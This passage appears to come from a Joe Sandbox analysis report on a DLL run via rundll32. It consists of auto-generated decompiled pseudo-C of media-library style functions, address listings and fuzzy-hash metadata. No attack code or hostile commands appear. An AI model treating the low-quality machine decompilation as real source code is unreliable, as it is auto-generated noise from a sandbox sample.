                                                      									E100265C0( &(__esp[0xf]));
                                                      									goto L25;
                                                      								}
                                                      								__eax = __esp[0xa];
                                                      								__ebp = __ebp + 1;
                                                      								__eax = __esp[0xa][0x20];
                                                      								__eflags = __ebp - __eax;
                                                      								if(__ebp >= __eax) {
                                                      									__esi = __esp[0xb];
                                                      									__ebx = __edi;
                                                      									__edx = __esp[0xa];
                                                      									L21:
                                                      									__eflags = __eax;
                                                      									if(__eax <= 0) {
                                                      										goto L30;
                                                      									}
                                                      									goto L22;
                                                      								}
                                                      								__esi = __esp[0xf];
                                                      							}
                                                      							__edx = __esp[0xa];
                                                      							__ebx = __edi;
                                                      							__esi = __esp[0xb];
                                                      							__eax =  *(__edx + 0x20);
                                                      							goto L21;
                                                      						}
                                                      					}
                                                      					 *__esp = __esi;
                                                      					__eax =  *__edx();
                                                      					__eflags = __eax;
                                                      					__ebx = __eax;
                                                      					if(__eax < 0) {
                                                      						goto L25;
                                                      					} else {
                                                      						__eax = __esi[4];
                                                      						goto L9;
                                                      					}
                                                      				}
                                                      				__ebx = __ebx[4];
                                                      				__eax = L10031930(__ecx);
                                                      				 *__esp = __esi;
                                                      				__esp[4] = __ebx;
                                                      				__ebx = 0xffffffd8;
                                                      				__esp[3] = __eax;
                                                      				__eax = "The hardware pixel format \'%s\' is not supported by the device type \'%s\'\n";
                                                      				__esp[2] = "The hardware pixel format \'%s\' is not supported by the device type \'%s\'\n";
                                                      				__eax = 0x10;
                                                      				__esp[1] = 0x10;
                                                      				__eax = L10023A40();
                                                      				goto L2;
                                                      			}



                                                      0x1001e5ac
                                                      0x1001e5ac
                                                      0x1001e5ae
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x1001e5ae
                                                      0x1001e580
                                                      0x1001e580
                                                      0x1001e59f
                                                      0x1001e5a3
                                                      0x1001e5a5
                                                      0x1001e5a9
                                                      0x00000000
                                                      0x1001e5a9
                                                      0x1001e4f9
                                                      0x1001e4d1
                                                      0x1001e4d4
                                                      0x1001e4d6
                                                      0x1001e4d8
                                                      0x1001e4da
                                                      0x00000000
                                                      0x1001e4e0
                                                      0x1001e4e0
                                                      0x00000000
                                                      0x1001e4e0
                                                      0x1001e4da
                                                      0x1001e648
                                                      0x1001e64e
                                                      0x1001e653
                                                      0x1001e656
                                                      0x1001e65a
                                                      0x1001e65f
                                                      0x1001e663
                                                      0x1001e668
                                                      0x1001e66c
                                                      0x1001e671
                                                      0x1001e675
                                                      0x00000000

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: mv_callocmv_frame_allocmv_frame_freemv_freepmv_get_pix_fmt_namemv_image_check_sizemv_log
                                                      • String ID:
                                                      • API String ID: 473889652-0
                                                      • Opcode ID: 9fa864ee1928c6bd1dd4db397f2e61f531e39c49d346cdfc62535eb3725c1c8c
                                                      • Instruction ID: f0d2ef2185eafc4a44fc2f14c59591e06059a7926607cfdcd1216548b2331345
                                                      • Opcode Fuzzy Hash: 9fa864ee1928c6bd1dd4db397f2e61f531e39c49d346cdfc62535eb3725c1c8c
                                                      • Instruction Fuzzy Hash: C841E274604B828FD750DF69C480A0AF7E5FF88754F56892DE999DB321E770EC818B81
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 16%
                                                      			E1001E689(intOrPtr __ebx, signed int __ecx, intOrPtr __edi, intOrPtr __esi, intOrPtr __ebp, signed int* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, signed int _a20) {
                                                      				intOrPtr _v4;
                                                      				intOrPtr _v8;
                                                      				intOrPtr _v12;
                                                      				intOrPtr _v16;
                                                      				signed int _v32;
                                                      				signed int _v52;
                                                      				intOrPtr _v56;
                                                      				intOrPtr _t50;
                                                      				signed int _t51;
                                                      				intOrPtr* _t60;
                                                      				intOrPtr* _t64;
                                                      				void* _t66;
                                                      				void* _t68;
                                                      				signed int _t69;
                                                      				intOrPtr _t77;
                                                      				intOrPtr* _t83;
                                                      				intOrPtr _t85;
                                                      				intOrPtr _t88;
                                                      				void* _t89;
                                                      				intOrPtr* _t94;
                                                      
                                                      				_t70 = __ebx;
                                                      				_t73 = __ecx ^ __ecx;
                                                      				_v12 = __esi;
                                                      				_t88 = _a16;
                                                      				_v8 = __edi;
                                                      				_t77 = _a12;
                                                      				_v16 = __ebx;
                                                      				_v4 = __ebp;
                                                      				_v32 = __ecx ^ __ecx;
                                                      				_t85 =  *((intOrPtr*)(_t88 + 4));
                                                      				_t50 =  *((intOrPtr*)( *((intOrPtr*)(_t85 + 4)) + 0xc));
                                                      				if(_t50 == 0) {
                                                      					L2:
                                                      					 *_t94 = _t77;
                                                      					_t51 = L1001D990();
                                                      					_v32 = _t51;
                                                      					if(_t51 == 0) {
                                                      						goto L12;
                                                      					} else {
                                                      						_t70 =  *((intOrPtr*)(_t51 + 4));
                                                      						 *((intOrPtr*)(_t70 + 0x24)) = _a8;
                                                      						 *((intOrPtr*)(_t70 + 0x28)) =  *((intOrPtr*)(_t85 + 0x28));
                                                      						 *((intOrPtr*)(_t70 + 0x2c)) =  *((intOrPtr*)(_t85 + 0x2c));
                                                      						 *((intOrPtr*)(_t70 + 0x30)) =  *((intOrPtr*)(_t85 + 0x30));
                                                      						 *_t94 = _t88;
                                                      						_a12 = L10009FC0(_t70, _t73);
                                                      						_t60 =  *((intOrPtr*)(_t70 + 4));
                                                      						if( *((intOrPtr*)(_t60 + 0xc)) == 0) {
                                                      							_t89 = 0xfffffff4;
                                                      							goto L20;
                                                      						} else {
                                                      							 *(_t60 + 0x10) = _a20 & 0x0000000f;
                                                      							_t83 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t85 + 4)))) + 0x58));
                                                      							if(_t83 == 0) {
                                                      								L15:
                                                      								_t64 =  *((intOrPtr*)( *_t60 + 0x54));
                                                      								if(_t64 == 0) {
                                                      									goto L7;
                                                      								} else {
                                                      									_v56 = _t85;
                                                      									 *_t94 = _t70;
                                                      									_v52 = _a20;
                                                      									_t66 =  *_t64();
                                                      									_t89 = _t66;
                                                      									if(_t66 == 0xffffffd8 || _t89 == 0) {
                                                      										goto L7;
                                                      									} else {
                                                      										goto L18;
                                                      									}
                                                      								}
                                                      							} else {
                                                      								_v56 = _t85;
                                                      								 *_t94 = _t70;
                                                      								_v52 = _a20;
                                                      								_t68 =  *_t83();
                                                      								_t89 = _t68;
                                                      								if(_t68 == 0xffffffd8) {
                                                      									_t60 =  *((intOrPtr*)(_t70 + 4));
                                                      									goto L15;
                                                      								} else {
                                                      									if(_t89 != 0) {
                                                      										L18:
                                                      										_t60 =  *((intOrPtr*)(_t70 + 4));
                                                      										L20:
                                                      										 *_t94 = _t60 + 0xc;
                                                      										E1000A000(_t70, _t89);
                                                      										goto L13;
                                                      									} else {
                                                      										L7:
                                                      										 *_a4 = _v32;
                                                      										goto L8;
                                                      									}
                                                      								}
                                                      							}
                                                      						}
                                                      					}
                                                      				} else {
                                                      					_t73 =  *(_t50 + 4);
                                                      					_t70 =  *((intOrPtr*)(_t77 + 4));
                                                      					if( *((intOrPtr*)( *(_t50 + 4) + 0xc)) ==  *((intOrPtr*)(_t77 + 4))) {
                                                      						 *_t94 = _t50;
                                                      						_t69 = L10009FC0(_t70, _t73);
                                                      						 *_a4 = _t69;
                                                      						if(_t69 != 0) {
                                                      							L8:
                                                      							_t89 = 0;
                                                      						} else {
                                                      							L12:
                                                      							_t89 = 0xfffffff4;
                                                      							L13:
                                                      							 *_t94 =  &_v32;
                                                      							E1000A000(_t70, _t89);
                                                      						}
                                                      					} else {
                                                      						goto L2;
                                                      					}
                                                      				}
                                                      				return _t89;
                                                      			}
























                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: mv_buffer_ref$mv_buffer_unrefmv_hwframe_ctx_alloc
                                                      • String ID:
                                                      • API String ID: 2050485749-0
                                                      • Opcode ID: dcc45be784228100b903491f3aa986d3d2d3c443bc532d0d1586efe615cdb925
                                                      • Instruction ID: 8b6b2c4b9edff8b5b994b7bafb8a9cba886c6cdf0ee15f0dc382da97d3216468
                                                      • Opcode Fuzzy Hash: dcc45be784228100b903491f3aa986d3d2d3c443bc532d0d1586efe615cdb925
                                                      • Instruction Fuzzy Hash: 7E417079A087518FD744DF29C18091AFBE1FF89350F568A6DE8989B395D730EC81CB82
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • GetCurrentThreadId.KERNEL32 ref: 100A1580
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: CurrentThread
                                                      • String ID:
                                                      • API String ID: 2882836952-0
                                                      • Opcode ID: aad5760cf48bfe59ace8456a0545fe3771cbea0c5a493778d31e095d93af85e1
                                                      • Instruction ID: a603e3a71963cb926592ecdf01b935e1f93b8b32596d5f9433372c4bec14c4a6
                                                      • Opcode Fuzzy Hash: aad5760cf48bfe59ace8456a0545fe3771cbea0c5a493778d31e095d93af85e1
                                                      • Instruction Fuzzy Hash: AD31AE75B04612CBDB00EFA8C98439A77E5EBC03E0F598579E8598F249EA75CC40CBD2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: mv_freep$mv_mallocz
                                                      • String ID:
                                                      • API String ID: 2455733640-0
                                                      • Opcode ID: 9f74527f40638788ac7371101fbd516078908c2a159fba3966d1ad274412a250
                                                      • Instruction ID: 7473898efd5c84ff4cba6f3e963b26fd6c8cdcec3b0c7db7706523d113c4544c
                                                      • Opcode Fuzzy Hash: 9f74527f40638788ac7371101fbd516078908c2a159fba3966d1ad274412a250
                                                      • Instruction Fuzzy Hash: 2B31D074904B11CFD760DF25C88191AB7E0FF89391B168A5DEC999B719E730E880CB92
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 20%
                                                      			E10012049(signed int __ebx, void* __ecx, void* __edx) {
                                                      				signed int* _t142;
                                                      				void* _t152;
                                                      				void* _t154;
                                                      				signed int* _t155;
                                                      				int _t157;
                                                      				signed int _t159;
                                                      				signed int _t165;
                                                      				int _t173;
                                                      				void* _t175;
                                                      				void* _t178;
                                                      				signed int _t179;
                                                      				void** _t180;
                                                      				void* _t183;
                                                      				signed int _t190;
                                                      				void** _t191;
                                                      				void* _t192;
                                                      				signed char _t195;
                                                      				void* _t208;
                                                      				void* _t210;
                                                      				void* _t212;
                                                      				void* _t213;
                                                      				void* _t214;
                                                      				void* _t215;
                                                      				void* _t217;
                                                      				signed int _t221;
                                                      				int _t223;
                                                      				void* _t224;
                                                      				void* _t230;
                                                      				void* _t232;
                                                      				int _t234;
                                                      				int _t236;
                                                      				void* _t237;
                                                      				void* _t239;
                                                      				void* _t241;
                                                      				signed int* _t243;
                                                      				void** _t246;
                                                      
                                                      				_t210 = __edx;
                                                      				_t179 = __ebx;
                                                      				while(1) {
                                                      					L42:
                                                      					 *_t246 = _t192;
                                                      					_t246[0x19] = _t210;
                                                      					_t246[9] = _t192;
                                                      					_t236 = strlen(??);
                                                      					 *_t246 = _t246[8];
                                                      					_t173 = strlen(??);
                                                      					 *_t246 = _t246[9];
                                                      					_t223 = _t173;
                                                      					_t84 = _t173 + 1; // 0x1
                                                      					_t246[1] = _t236 + _t84;
                                                      					_t175 = E10026280();
                                                      					if(_t175 == 0) {
                                                      						break;
                                                      					}
                                                      					_t86 = _t223 + 1; // 0x1
                                                      					_t246[8] = _t86;
                                                      					_t214 = _t175 + _t236;
                                                      					_t237 = _t246[0xf];
                                                      					_t195 = _t214;
                                                      					_t246[0xb] = _t214;
                                                      					_t246[9] = _t214;
                                                      					_t215 = _t246[0x19];
                                                      					_t246[0xa] = _t237;
                                                      					if(_t246[8] >= 8) {
                                                      						if((_t195 & 0x00000001) != 0) {
                                                      							 *(_t246[0xb]) =  *_t237 & 0x000000ff;
                                                      							_t246[8] = _t223;
                                                      							_t246[9] = _t246[9] + 1;
                                                      							_t246[0xa] = _t246[0xa] + 1;
                                                      						}
                                                      						if((_t246[9] & 0x00000002) != 0) {
                                                      							_t239 = _t246[0xa];
                                                      							_t224 = _t246[9];
                                                      							 *_t224 =  *_t239 & 0x0000ffff;
                                                      							_t246[9] = _t224 + 2;
                                                      							_t246[8] = _t246[8] - 2;
                                                      							_t246[0xa] = _t239 + 2;
                                                      						}
                                                      						if((_t246[9] & 0x00000004) != 0) {
                                                      							_t241 = _t246[0xa];
                                                      							_t208 = _t246[9] + 4;
                                                      							 *(_t208 - 4) =  *_t241;
                                                      							_t246[9] = _t208;
                                                      							_t246[8] = _t246[8] - 4;
                                                      							_t246[0xa] = _t241 + 4;
                                                      						}
                                                      					}
                                                      					_t246[0x19] = _t215;
                                                      					_t246[0xb] = _t175;
                                                      					memcpy(_t246[9], _t246[0xa], _t246[8]);
                                                      					_t246 =  &(_t246[3]);
                                                      					 *_t246 =  &(_t246[0xf]);
                                                      					E100265C0();
                                                      					_t212 = _t246[0x19];
                                                      					_t246[0xf] = _t246[0xb];
                                                      					goto L18;
                                                      					while(1) {
                                                      						L19:
                                                      						_t234 = _t246[0xf];
                                                      						if(_t234 == 0) {
                                                      							goto L39;
                                                      						}
                                                      						L20:
                                                      						_t191 = _t190 + _t159 * 8;
                                                      						_t191[1] = _t234;
                                                      						 *_t191 = _t246[0xe];
                                                      						 *_t243 = _t159 + 1;
                                                      						while(1) {
                                                      							L21:
                                                      							_t179 = (_t180 -  *((intOrPtr*)(_t210 + 4)) >> 3) + 1;
                                                      							if( *_t210 <= _t179) {
                                                      								break;
                                                      							}
                                                      							_t180 =  *((intOrPtr*)(_t210 + 4)) + _t179 * 8;
                                                      							if(_t180 == 0) {
                                                      								break;
                                                      							} else {
                                                      								_t230 =  *_t180;
                                                      								_t246[0xe] = 0;
                                                      								_t217 = _t180[1];
                                                      								_t243 =  *(_t246[0x18]);
                                                      								_t246[0xf] = 0;
                                                      								if(_t246[5] == 0) {
                                                      									if(_t217 == 0) {
                                                      										goto L4;
                                                      									} else {
                                                      										 *_t246 = _t217;
                                                      										_t246[0x19] = _t210;
                                                      										_t178 = E100267C0(_t180, _t217, _t230, _t243);
                                                      										_t210 = _t246[0x19];
                                                      										_t246[0xf] = _t178;
                                                      										if(_t230 != 0) {
                                                      											goto L5;
                                                      										} else {
                                                      											goto L25;
                                                      										}
                                                      									}
                                                      								} else {
                                                      									_t246[0xf] = _t217;
                                                      									L4:
                                                      									if(_t230 == 0) {
                                                      										L25:
                                                      										_t142 = _t243;
                                                      										_t183 = 0xffffffea;
                                                      										goto L26;
                                                      									} else {
                                                      										L5:
                                                      										_t246[4] = 0;
                                                      										if(_t246[6] == 0) {
                                                      											_t246[1] = _t230;
                                                      											 *_t246 = _t243;
                                                      											_t246[0x19] = _t210;
                                                      											_t246[3] = _t246[0x1a];
                                                      											_t246[2] = 0;
                                                      											_t152 = E100110D0();
                                                      											_t210 = _t246[0x19];
                                                      											_t246[4] = _t152;
                                                      										}
                                                      										if(_t246[7] == 0) {
                                                      											 *_t246 = _t230;
                                                      											_t246[0x19] = _t210;
                                                      											_t154 = E100267C0(_t180, _t217, _t230, _t243);
                                                      											_t210 = _t246[0x19];
                                                      											_t246[0xe] = _t154;
                                                      											_t232 = _t154;
                                                      											if(_t243 == 0) {
                                                      												goto L33;
                                                      											} else {
                                                      												if(_t154 == 0) {
                                                      													goto L10;
                                                      												} else {
                                                      													goto L8;
                                                      												}
                                                      											}
                                                      										} else {
                                                      											_t246[0xe] = _t230;
                                                      											if(_t243 == 0) {
                                                      												L33:
                                                      												 *_t246 = 8;
                                                      												_t246[0x19] = _t210;
                                                      												_t155 = E100265E0();
                                                      												_t232 = _t246[0xe];
                                                      												_t243 = _t155;
                                                      												 *(_t246[0x18]) = _t243;
                                                      												if(_t243 == 0) {
                                                      													L35:
                                                      													_t142 = _t243;
                                                      													_t183 = 0xfffffff4;
                                                      													L26:
                                                      													if(_t142 != 0) {
                                                      														L11:
                                                      														if( *_t142 == 0) {
                                                      															 *_t246 =  &(_t142[1]);
                                                      															E100265C0();
                                                      															 *_t246 = _t246[0x18];
                                                      															E100265C0();
                                                      														}
                                                      													}
                                                      													 *_t246 = _t246[0xe];
                                                      													L100265B0();
                                                      													 *_t246 = _t246[0xf];
                                                      													L100265B0();
                                                      													return _t183;
                                                      												} else {
                                                      													_t210 = _t246[0x19];
                                                      													if(_t232 != 0) {
                                                      														goto L8;
                                                      													} else {
                                                      														goto L35;
                                                      													}
                                                      												}
                                                      											} else {
                                                      												L8:
                                                      												_t157 = _t246[0xf];
                                                      												_t246[8] = _t157;
                                                      												if(_t217 == 0 || _t157 != 0) {
                                                      													if(_t246[4] == 0) {
                                                      														_t159 =  *_t243;
                                                      														if(_t246[8] == 0) {
                                                      															goto L39;
                                                      														} else {
                                                      															_t246[0x19] = _t210;
                                                      															_t246[2] = 8;
                                                      															_t246[1] = _t159 + 1;
                                                      															 *_t246 = _t243[1];
                                                      															_t165 = E100264F0();
                                                      															_t210 = _t246[0x19];
                                                      															_t190 = _t165;
                                                      															if(_t165 == 0) {
                                                      																goto L10;
                                                      															} else {
                                                      																_t243[1] = _t165;
                                                      																_t159 =  *_t243;
                                                      																goto L19;
                                                      															}
                                                      														}
                                                      													} else {
                                                      														if((_t246[0x1a] & 0x00000010) != 0) {
                                                      															 *_t246 = _t232;
                                                      															_t246[0x19] = _t210;
                                                      															L100265B0();
                                                      															 *_t246 = _t246[0xf];
                                                      															L100265B0();
                                                      															_t210 = _t246[0x19];
                                                      															continue;
                                                      														} else {
                                                      															_t192 =  *(_t246[4] + 4);
                                                      															if(_t246[8] == 0 || (_t246[0x1a] & 0x00000020) == 0) {
                                                      																 *_t246 = _t192;
                                                      																_t246[0x19] = _t210;
                                                      																L100265B0();
                                                      																_t212 = _t246[0x19];
                                                      																L18:
                                                      																_t246[0x19] = _t212;
                                                      																 *_t246 =  *(_t246[4]);
                                                      																L100265B0();
                                                      																_t221 =  *_t243;
                                                      																_t190 = _t243[1];
                                                      																_t213 = _t246[4];
                                                      																_t34 = _t221 - 1; // 0x3
                                                      																_t159 = _t34;
                                                      																 *_t243 = _t159;
                                                      																 *_t213 =  *(_t190 + _t159 * 8);
                                                      																 *((intOrPtr*)(_t213 + 4)) =  *((intOrPtr*)(_t190 + 4 + _t159 * 8));
                                                      																_t210 = _t246[0x19];
                                                      																L19:
                                                      																_t234 = _t246[0xf];
                                                      																if(_t234 == 0) {
                                                      																	goto L39;
                                                      																}
                                                      																continue;
                                                      															} else {
                                                      																goto L42;
                                                      															}
                                                      														}
                                                      													}
                                                      												} else {
                                                      													goto L10;
                                                      												}
                                                      											}
                                                      										}
                                                      									}
                                                      								}
                                                      							}
                                                      							L52:
                                                      						}
                                                      						return 0;
                                                      						goto L52;
                                                      						L39:
                                                      						if(_t159 == 0) {
                                                      							_t246[0x19] = _t210;
                                                      							 *_t246 =  &(_t243[1]);
                                                      							E100265C0();
                                                      							 *_t246 = _t246[0x18];
                                                      							E100265C0();
                                                      							_t210 = _t246[0x19];
                                                      						}
                                                      						_t246[0x19] = _t210;
                                                      						 *_t246 =  &(_t246[0xe]);
                                                      						E100265C0();
                                                      						_t210 = _t246[0x19];
                                                      						goto L21;
                                                      					}
                                                      				}
                                                      				L10:
                                                      				_t142 = _t243;
                                                      				_t183 = 0xfffffff4;
                                                      				goto L11;
                                                      			}







































                                                      0x10011f87
                                                      0x10011f8b
                                                      0x10011f90
                                                      0x10011f94
                                                      0x10011f9c
                                                      0x10011f9e
                                                      0x10011fac
                                                      0x10011fac
                                                      0x10011fae
                                                      0x10011eeb
                                                      0x10011eed
                                                      0x10011dde
                                                      0x10011de2
                                                      0x10011f63
                                                      0x10011f66
                                                      0x10011f6f
                                                      0x10011f72
                                                      0x10011f72
                                                      0x10011de2
                                                      0x10011dec
                                                      0x10011def
                                                      0x10011df8
                                                      0x10011dfb
                                                      0x10011e09
                                                      0x10011fa0
                                                      0x10011fa2
                                                      0x10011fa6
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x10011fa6
                                                      0x10011dc7
                                                      0x10011dc7
                                                      0x10011dc7
                                                      0x10011dcd
                                                      0x10011dd1
                                                      0x10011e16
                                                      0x10011fc4
                                                      0x10011fc9
                                                      0x00000000
                                                      0x10011fcb
                                                      0x10011fcb
                                                      0x10011fd5
                                                      0x10011fd9
                                                      0x10011fe0
                                                      0x10011fe3
                                                      0x10011fe8
                                                      0x10011fee
                                                      0x10011ff0
                                                      0x00000000
                                                      0x10011ff6
                                                      0x10011ff6
                                                      0x10011ff9
                                                      0x00000000
                                                      0x10011ff9
                                                      0x10011ff0
                                                      0x10011e1c
                                                      0x10011e21
                                                      0x100120f0
                                                      0x100120f3
                                                      0x100120f7
                                                      0x10012100
                                                      0x10012103
                                                      0x10012108
                                                      0x00000000
                                                      0x10011e27
                                                      0x10011e31
                                                      0x10011e34
                                                      0x10011e41
                                                      0x10011e44
                                                      0x10011e48
                                                      0x10011e4d
                                                      0x10011e51
                                                      0x10011e51
                                                      0x10011e5b
                                                      0x10011e5e
                                                      0x10011e63
                                                      0x10011e66
                                                      0x10011e69
                                                      0x10011e6d
                                                      0x10011e6d
                                                      0x10011e70
                                                      0x10011e7a
                                                      0x10011e7c
                                                      0x10011e7f
                                                      0x10011e83
                                                      0x10011e83
                                                      0x10011e89
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x10011e34
                                                      0x10011e21
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x10011dd1
                                                      0x10011dc1
                                                      0x10011db5
                                                      0x10011d97
                                                      0x10011d8b
                                                      0x00000000
                                                      0x10011d68
                                                      0x10011ebb
                                                      0x00000000
                                                      0x10012008
                                                      0x1001200a
                                                      0x10012028
                                                      0x1001202f
                                                      0x10012032
                                                      0x1001203b
                                                      0x1001203e
                                                      0x10012043
                                                      0x10012043
                                                      0x1001200c
                                                      0x10012014
                                                      0x10012017
                                                      0x1001201c
                                                      0x00000000
                                                      0x1001201c
                                                      0x10011e83
                                                      0x10011dd7
                                                      0x10011dd7
                                                      0x10011dd9
                                                      0x00000000

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: strlen$_aligned_reallocmv_freepmv_realloc
                                                      • String ID:
                                                      • API String ID: 895301365-0
                                                      • Opcode ID: 0c29223b98c086e2b46ad98e7ce3030191046c0ef949241b854c2fd3e23e1c87
                                                      • Instruction ID: 2d1e53f319068be23ad8f88d31967b5a2669bada8836d01dcbd6984a06f05035
                                                      • Opcode Fuzzy Hash: 0c29223b98c086e2b46ad98e7ce3030191046c0ef949241b854c2fd3e23e1c87
                                                      • Instruction Fuzzy Hash: 6131BDB99087018FC744CF29C18045AFBE1FF88718F158A6EE889AB311E731E945CF82
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: ExclusiveLock$AcquireReleasemv_freep
                                                      • String ID:
                                                      • API String ID: 2444013405-0
                                                      • Opcode ID: 69b2e29afcab2b062c2147764c90657bebc76e2e75c4088fc9dd16b63d4a40d8
                                                      • Instruction ID: 7158096d1edc9a63a07daa50029a30cfeb496985ca544081e00db1e7d26d72ff
                                                      • Opcode Fuzzy Hash: 69b2e29afcab2b062c2147764c90657bebc76e2e75c4088fc9dd16b63d4a40d8
